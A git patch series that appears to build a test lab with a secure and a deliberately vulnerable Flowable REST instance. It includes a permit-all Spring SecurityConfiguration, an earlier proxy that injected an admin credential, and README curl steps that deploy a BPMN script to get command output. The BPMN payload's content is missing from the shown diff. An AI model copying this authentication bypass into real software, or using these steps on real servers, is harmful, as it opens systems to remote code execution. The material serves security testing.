From c8343015167ddb21e50395002210d9269d122843 Mon Sep 17 00:00:00 2001
From: devampkid
Date: Wed, 13 Aug 2025 03:48:05 +0400
Subject: [PATCH 1/7] Flowable exposed UI
---
 flowable/exposed_ui/README.md | 21 +++++++++++++++++++++
 1 file changed, 21 insertions(+)
 create mode 100644 flowable/exposed_ui/README.md
diff --git a/flowable/exposed_ui/README.md b/flowable/exposed_ui/README.md
new file mode 100644
index 00000000..7a2e975a
--- /dev/null
+++ b/flowable/exposed_ui/README.md
@@ -0,0 +1,21 @@
+# Exposed UI Setup
+```bash
+docker run -p 127.0.0.1:8080:8080 flowable/flowable-rest
+```
+
+# How to Exploit the Exposed UI
+```bash
+curl -X POST \
+  'http://localhost:4200/flowable-rest/service/repository/deployments' \
+  -H 'Content-Type: multipart/form-data' \
+  -H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \
+  -F 'file=@jsScript.bpmn'
+
+curl -X POST \
+  'http://localhost:4200/flowable-rest/service/runtime/process-instances' \
+  -H 'Content-Type: application/json' \
+  -H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \
+  -d '{
+    "processDefinitionKey": "jsScriptProcess"
+  }'
+```
\ No newline at end of file
From 16062c163037a17e04f2bfbf2b30d792bab63c96 Mon Sep 17 00:00:00 2001
From: devampkid
Date: Wed, 13 Aug 2025 04:02:18 +0400
Subject: [PATCH 2/7] minor: fix ports of curl cmds
---
 flowable/exposed_ui/README.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/flowable/exposed_ui/README.md b/flowable/exposed_ui/README.md
index 7a2e975a..f6b28938 100644
--- a/flowable/exposed_ui/README.md
+++ b/flowable/exposed_ui/README.md
@@ -6,13 +6,13 @@ docker run -p 127.0.0.1:8080:8080 flowable/flowable-rest
 # How to Exploit the Exposed UI
 ```bash
 curl -X POST \
-  'http://localhost:4200/flowable-rest/service/repository/deployments' \
+  'http://localhost:8080/flowable-rest/service/repository/deployments' \
   -H 'Content-Type: multipart/form-data' \
   -H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \
   -F 'file=@jsScript.bpmn'
 
 curl -X POST \
-  'http://localhost:4200/flowable-rest/service/runtime/process-instances' \
+  'http://localhost:8080/flowable-rest/service/runtime/process-instances' \
   -H 'Content-Type: application/json' \
   -H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \
   -d '{
From 1124b318f07a64d95e07fa53eda7676188b801f8 Mon Sep 17 00:00:00 2001
From: devampkid
Date: Wed, 13 Aug 2025 04:16:33 +0400
Subject: [PATCH 3/7] add jsScript.bpmn
---
 flowable/exposed_ui/jsScript.bpmn | 30 ++++++++++++++++++++++++++++++
 1 file changed, 30 insertions(+)
 create mode 100644 flowable/exposed_ui/jsScript.bpmn
diff --git a/flowable/exposed_ui/jsScript.bpmn b/flowable/exposed_ui/jsScript.bpmn
new file mode 100644
index 00000000..0ec2779e
--- /dev/null
+++ b/flowable/exposed_ui/jsScript.bpmn
@@ -0,0 +1,30 @@ + + + + + + + + + + + + + +
From 1a54d32ee84cdbf6d8b52615d40fc48eeb08f809 Mon Sep 17 00:00:00 2001
From: devampkid
Date: Wed, 13 Aug 2025 14:36:48 +0400
Subject: [PATCH 4/7] finished the setup
---
 flowable/exposed_ui/Caddyfile | 5 +++++
 flowable/exposed_ui/README.md | 4 ++--
 flowable/exposed_ui/docker-compose.yml | 24 ++++++++++++++++++++++++
 3 files changed, 31 insertions(+), 2 deletions(-)
 create mode 100644 flowable/exposed_ui/Caddyfile
 create mode 100644 flowable/exposed_ui/docker-compose.yml
diff --git a/flowable/exposed_ui/Caddyfile b/flowable/exposed_ui/Caddyfile
new file mode 100644
index 00000000..a5808bf7
--- /dev/null
+++ b/flowable/exposed_ui/Caddyfile
@@ -0,0 +1,5 @@
+:8081 {
+    reverse_proxy flowable:8080 {
+        header_up Authorization "Basic cmVzdC1hZG1pbjp0ZXN0"
+    }
+}
\ No newline at end of file
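Review bot: The `header_up Authorization "Basic cmVzdC1hZG1pbjp0ZXN0"` line stamps a fixed admin credential onto every proxied request, so anything that can reach :8081 acts as that account, and nothing in the file says this is intentional. I'd add a comment above the site block: `# Lab only: this proxy injects a fixed admin credential so the upstream API answers without authentication. Keep :8081 bound to localhost.`. The companion docker-compose.yml in this commit publishes 8081 on all interfaces, which is where that binding has to be enforced.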
diff --git a/flowable/exposed_ui/README.md b/flowable/exposed_ui/README.md
index f6b28938..438b4920 100644
--- a/flowable/exposed_ui/README.md
+++ b/flowable/exposed_ui/README.md
@@ -6,13 +6,13 @@ docker run -p 127.0.0.1:8080:8080 flowable/flowable-rest
 # How to Exploit the Exposed UI
 ```bash
 curl -X POST \
-  'http://localhost:8080/flowable-rest/service/repository/deployments' \
+  'http://localhost:8081/flowable-rest/service/repository/deployments' \
   -H 'Content-Type: multipart/form-data' \
   -H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \
   -F 'file=@jsScript.bpmn'
 
 curl -X POST \
-  'http://localhost:8080/flowable-rest/service/runtime/process-instances' \
+  'http://localhost:8081/flowable-rest/service/runtime/process-instances' \
   -H 'Content-Type: application/json' \
   -H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \
   -d '{
diff --git a/flowable/exposed_ui/docker-compose.yml b/flowable/exposed_ui/docker-compose.yml
new file mode 100644
index 00000000..216aeb5d
--- /dev/null
+++ b/flowable/exposed_ui/docker-compose.yml
@@ -0,0 +1,24 @@
+version: '3'
+
+services:
+  flowable:
+    image: flowable/flowable-rest
+    container_name: flowable-rest
+    networks:
+      - flowable-network
+
+  caddy:
+    image: caddy:2.8.4
+    container_name: caddy-proxy
+    ports:
+      - "8081:8081"
+    volumes:
+      - ./Caddyfile:/etc/caddy/Caddyfile
+    networks:
+      - flowable-network
+    depends_on:
+      - flowable
+
+networks:
+  flowable-network:
+    driver: bridge
\ No newline at end of file
From cc2800002541a49fe29b344f8ca8eeb92c266711 Mon Sep 17 00:00:00 2001
From: devampkid
Date: Tue, 30 Sep 2025 20:06:44 +0400
Subject: [PATCH 5/7] updated README.md contains both secure and vulnerable setup instructions
---
 flowable/exposed_ui/README.md | 13 +++++++------
 flowable/exposed_ui/docker-compose.yml | 2 ++
 2 files changed, 9 insertions(+), 6 deletions(-)
diff --git a/flowable/exposed_ui/README.md b/flowable/exposed_ui/README.md
index 438b4920..5f9bdcc2 100644
--- a/flowable/exposed_ui/README.md
+++ b/flowable/exposed_ui/README.md
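Review bot: `- "8081:8081"` under the caddy service publishes the authentication-stripping proxy on every interface of the host, whereas the README's original `docker run -p 127.0.0.1:8080:8080` kept the lab on loopback; `- "127.0.0.1:8081:8081"` keeps local testing working without exposing it to the rest of the network. The same applies to the `"8080:8080"` mapping added to the flowable service in the next commit and to both mappings in the later compose rewrite that replaces caddy with a built image. Separately, `image: flowable/flowable-rest` carries no tag while `caddy:2.8.4` is pinned, so what the "vulnerable" instance actually runs tracks whatever `latest` resolves to on the day it is pulled.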
@@ -1,21 +1,22 @@
-# Exposed UI Setup
+# Setup secure and vulnerable Flowable instances
 ```bash
-docker run -p 127.0.0.1:8080:8080 flowable/flowable-rest
+docker compose up
 ```
+test secure instance with this URL: http://localhost:8080/flowable-rest/service/repository/deployments
+test vulnerable instance with this URL: http://localhost:8081/flowable-rest/service/repository/deployments
 
-# How to Exploit the Exposed UI
+# How to Exploit the Exposed UI (on Vulnerable Instance)
 ```bash
 curl -X POST \
   'http://localhost:8081/flowable-rest/service/repository/deployments' \
   -H 'Content-Type: multipart/form-data' \
-  -H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \
   -F 'file=@jsScript.bpmn'
 
 curl -X POST \
   'http://localhost:8081/flowable-rest/service/runtime/process-instances' \
   -H 'Content-Type: application/json' \
-  -H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \
   -d '{
     "processDefinitionKey": "jsScriptProcess"
   }'
-```
\ No newline at end of file
+```
+Look for the `"variables":[{"name":"commandOutput","type":"string","value":"` at output of the last command.
\ No newline at end of file
diff --git a/flowable/exposed_ui/docker-compose.yml b/flowable/exposed_ui/docker-compose.yml
index 216aeb5d..7a7ec456 100644
--- a/flowable/exposed_ui/docker-compose.yml
+++ b/flowable/exposed_ui/docker-compose.yml
@@ -4,6 +4,8 @@ services:
   flowable:
     image: flowable/flowable-rest
     container_name: flowable-rest
+    ports:
+      - "8080:8080"
     networks:
       - flowable-network
 
From f62b28437252a9358f7c2479f4fabb14f856938e Mon Sep 17 00:00:00 2001
From: devampkid
Date: Fri, 13 Feb 2026 16:18:08 +0400
Subject: [PATCH 6/7] instead of a reverse proxy which removes authentication, we skip the authentication by changing the spring boot security configuration
---
 flowable/exposed_ui/Caddyfile | 5 ----
 flowable/exposed_ui/Dockerfile | 19 +++++++++++++++
 flowable/exposed_ui/README.md | 24 ++++++++++++++++++---
 .../exposed_ui/SecurityConfiguration.java | 23 ++++++++++++++++++
 flowable/exposed_ui/docker-compose.yml | 18 ++++++---------
 5 files changed, 70 insertions(+), 19 deletions(-)
 delete mode 100644 flowable/exposed_ui/Caddyfile
 create mode 100644 flowable/exposed_ui/Dockerfile
 create mode 100644 flowable/exposed_ui/SecurityConfiguration.java
diff --git a/flowable/exposed_ui/Caddyfile b/flowable/exposed_ui/Caddyfile
deleted file mode 100644
index a5808bf7..00000000
--- a/flowable/exposed_ui/Caddyfile
+++ /dev/null
@@ -1,5 +0,0 @@
-:8081 {
-    reverse_proxy flowable:8080 {
-        header_up Authorization "Basic cmVzdC1hZG1pbjp0ZXN0"
-    }
-}
\ No newline at end of file
diff --git a/flowable/exposed_ui/Dockerfile b/flowable/exposed_ui/Dockerfile
new file mode 100644
index 00000000..534dc142
--- /dev/null
+++ b/flowable/exposed_ui/Dockerfile
@@ -0,0 +1,19 @@
+FROM eclipse-temurin:21-jdk AS builder
+
+# Copy the Flowable REST app libs for compilation classpath
+COPY --from=flowable/flowable-rest /app/WEB-INF/lib /libs
+COPY --from=flowable/flowable-rest /app/WEB-INF/classes /classes
+
+# Copy our replacement SecurityConfiguration
+COPY SecurityConfiguration.java /src/SecurityConfiguration.java
+
+# Compile the replacement SecurityConfiguration against the app's classpath
+RUN javac -cp "/libs/*:/classes" \
+    -d /output \
+    /src/SecurityConfiguration.java
+
+FROM flowable/flowable-rest
+
+# Replace the original SecurityConfiguration with our permit-all version
+COPY --from=builder /output/org/flowable/rest/conf/SecurityConfiguration.class \
+    /app/WEB-INF/classes/org/flowable/rest/conf/SecurityConfiguration.class
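Review bot: The builder stage's `COPY --from=flowable/flowable-rest` lines and the final `FROM flowable/flowable-rest` are independent, untagged image references, so the replacement class is compiled against one resolution of `latest` and dropped into whatever the second reference resolves to; a Spring Security API change between the two would only show up as a startup failure of the "vulnerable" container. Pinning all three to the same tag or digest (`flowable/flowable-rest:<version>` or `flowable/flowable-rest@sha256:<digest>`, placeholders) closes that gap and makes the lab reproducible. The `/app/WEB-INF/lib` and `/app/WEB-INF/classes` paths are presumably the image's webapp layout; a comment naming the image version they were checked against would help whoever rebuilds this later.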
diff --git a/flowable/exposed_ui/README.md b/flowable/exposed_ui/README.md
index 5f9bdcc2..83330f99 100644
--- a/flowable/exposed_ui/README.md
+++ b/flowable/exposed_ui/README.md
@@ -2,8 +2,26 @@
 ```bash
 docker compose up
 ```
-test secure instance with this URL: http://localhost:8080/flowable-rest/service/repository/deployments
-test vulnerable instance with this URL: http://localhost:8081/flowable-rest/service/repository/deployments
+
+## Test Secure Instance
+The secure instance requires basic authentication (default credentials: `rest-admin:test`):
+```bash
+# Without credentials — should return 401 Unauthorized
+curl -s -o /dev/null -w "%{http_code}" http://localhost:8080/flowable-rest/service/repository/deployments
+# Expected: 401
+
+# With credentials — should return 200 OK
+curl -v -u rest-admin:test http://localhost:8080/flowable-rest/service/repository/deployments
+# Expected: HTTP/1.1 200 with http response contains a json
+```
+
+## Test Vulnerable Instance
+The vulnerable instance has basic authentication disabled:
+```bash
+# Without credentials — should return 200 OK (no auth required)
+curl -v http://localhost:8081/flowable-rest/service/repository/deployments
+# Expected: HTTP/1.1 200
+```
 
 # How to Exploit the Exposed UI (on Vulnerable Instance)
 ```bash
@@ -19,4 +37,4 @@ curl -X POST \
     "processDefinitionKey": "jsScriptProcess"
   }'
 ```
-Look for the `"variables":[{"name":"commandOutput","type":"string","value":"` at output of the last command.
\ No newline at end of file
+Look for the `"variables":[{"name":"commandOutput","type":"string","value":"` at output of the last command.
diff --git a/flowable/exposed_ui/SecurityConfiguration.java b/flowable/exposed_ui/SecurityConfiguration.java
new file mode 100644
index 00000000..89b1ce33
--- /dev/null
+++ b/flowable/exposed_ui/SecurityConfiguration.java
@@ -0,0 +1,23 @@
+package org.flowable.rest.conf;
+
+import org.springframework.context.annotation.Bean;
+import org.springframework.context.annotation.Configuration;
+import org.springframework.security.config.annotation.web.builders.HttpSecurity;
+import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;
+import org.springframework.security.web.SecurityFilterChain;
+
+@Configuration
+@EnableWebSecurity
+public class SecurityConfiguration {
+
+    @Bean
+    public SecurityFilterChain securityFilterChain(HttpSecurity http) throws Exception {
+        http
+            .authorizeHttpRequests(authorize -> authorize
+                .anyRequest().permitAll()
+            )
+            .csrf(csrf -> csrf.disable())
+            .httpBasic(basic -> basic.disable());
+        return http.build();
+    }
+}
diff --git a/flowable/exposed_ui/docker-compose.yml b/flowable/exposed_ui/docker-compose.yml
index 7a7ec456..1f36f15f 100644
--- a/flowable/exposed_ui/docker-compose.yml
+++ b/flowable/exposed_ui/docker-compose.yml
@@ -1,26 +1,22 @@
 version: '3'
 
 services:
-  flowable:
+  flowable-secure:
     image: flowable/flowable-rest
-    container_name: flowable-rest
+    container_name: flowable-rest-secure
     ports:
       - "8080:8080"
     networks:
       - flowable-network
 
-  caddy:
-    image: caddy:2.8.4
-    container_name: caddy-proxy
+  flowable-vulnerable:
+    build: .
+    container_name: flowable-rest-vulnerable
     ports:
-      - "8081:8081"
-    volumes:
-      - ./Caddyfile:/etc/caddy/Caddyfile
+      - "8081:8080"
     networks:
       - flowable-network
-    depends_on:
-      - flowable
 
 networks:
   flowable-network:
-    driver: bridge
\ No newline at end of file
+    driver: bridge
From 69af0e7fee2a5ed09d1ec85f948e2fb5cf746503 Mon Sep 17 00:00:00 2001
From: kevin s
Date: Sat, 21 Feb 2026 02:47:56 +0400
Subject: [PATCH 7/7] Update flowable/exposed_ui/SecurityConfiguration.java
Co-authored-by: Robert Dick
---
 flowable/exposed_ui/SecurityConfiguration.java | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)
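Review bot: `SecurityConfiguration` carries no Javadoc saying that it deliberately shadows Flowable's own `org.flowable.rest.conf.SecurityConfiguration` with a permit-all chain, which is the one thing a reader of this source (or of the class dropped into `WEB-INF/classes`) most needs to know. I'd add a class comment such as `/** Lab-only replacement for Flowable's SecurityConfiguration: permits every request and disables CSRF and HTTP Basic. Not for use outside an isolated test network. */` and a one-line `@return` on `securityFilterChain` naming the chain it builds. Since the original class presumably registers more than this single bean, any other Flowable configuration that autowires those beans would fail at startup; a sentence confirming the application was verified to boot with this replacement would settle that. The `.csrf(csrf -> csrf.disable())` line deserves its own why-comment so it is read as part of the intended weakening rather than an oversight.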
diff --git a/flowable/exposed_ui/SecurityConfiguration.java b/flowable/exposed_ui/SecurityConfiguration.java
index 89b1ce33..4ad672ac 100644
--- a/flowable/exposed_ui/SecurityConfiguration.java
+++ b/flowable/exposed_ui/SecurityConfiguration.java
@@ -1,3 +1,21 @@
+/*
+ * Copyright 2026 Google LLC
+ *
+ * Modified from the original version to remove authentication checks
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
 package org.flowable.rest.conf;
 
 import org.springframework.context.annotation.Bean;